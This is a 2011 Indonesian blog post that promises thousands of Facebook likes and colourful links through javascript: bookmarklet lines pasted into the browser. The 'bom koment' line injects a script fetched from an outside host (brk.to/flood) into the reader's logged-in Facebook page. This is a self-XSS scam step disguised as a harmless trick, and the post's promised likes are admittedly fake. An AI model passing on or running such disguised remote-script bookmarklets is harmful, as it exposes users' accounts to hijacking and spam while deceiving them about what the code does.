Tuesday, 11 October 2011

Status Di Like Ribuan Orang Di Facebook

Bagikan ini ke :

Kembali Lagi di Blog iputu dirga yang tak pernah habisnya memberikan anda informasi menarik dan keren. Hari saya lagi bergembira ria. Kenapa karena saya baru saja membuat status dan langsung status saya di like ribuan orang (Yang bener..) bener lah. Apa jadinya jika kita membuat tak ada jempol atau komen di status kita?? Pasti status anda terasa nggak laku (kayak jualan aja nggak laku..).
Saya akan memberikan Trik Facebook Di like ribuan orang caranya agar bisa seperti saya.  Nih lihat Profil Facebook Saya:

Gimana Keren Kan, mau coba?? Yang pengen dapat jempol banyak silakan klik.... Link di Bawaah ini....

4.893 orang menyukai ini

9.893 orang menyukai ini

12.000 orang menyukai ini 

91.000 orang menyukai ini

Saya juga sediakan cara buat fb warna warni...
Spoiler:


javascript:i=0;c=["red","green","blue","yellow","magenta","orange"," pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',1);void(0); alert("http://iputu-dirga.blogspot.com")

bom koment

javascript:(a = (b = document).createElement("script")).src = "//brk.to/flood", b.body.appendChild(a); void(0);alert('Created By http://iputu-dirga.blogspot.com');updateTime();window.setInterval(updateTime, 1000);void(0)




Dengan me'ngklik ling di atas anda akan langsung mendapat ribuan jempol. Eiit.. Jangan bangga dulu itu semua merupakan like status palsu bukan dari orang orang yang menjadi teman kita di facebook. Walaupun begitu status anda akan menjadi ngetren.. Dengan trik tersebut. Demikianlah cara agar di like ribuan orang di facebook. Semoga dapat membantu anda yang sedang mencari bagaimana cara membuat status di like ribuan orang. Salam bloggers mania dari iputu dirga blog. TERIMA KASIH..

Artikel Lainnya:

Buat Fans Page

Game Facebook Paling Populer

Buat Facebook Jadi Warna Warni

6 comments:

Catatan sebelum berkomentar:
1. Berkomentarlah sesuai dengan postingan yang dibaca.
2. Link hidup pada komentar otomatis akan terhapus!
3. Komentar SPAM dan SARA otomatis dihapus!!!
4. Dilarang ngiklan di kolom komentar!
Mohon untuk dipatuhi demi kenyaman kita bersama
TERIMA KASIH.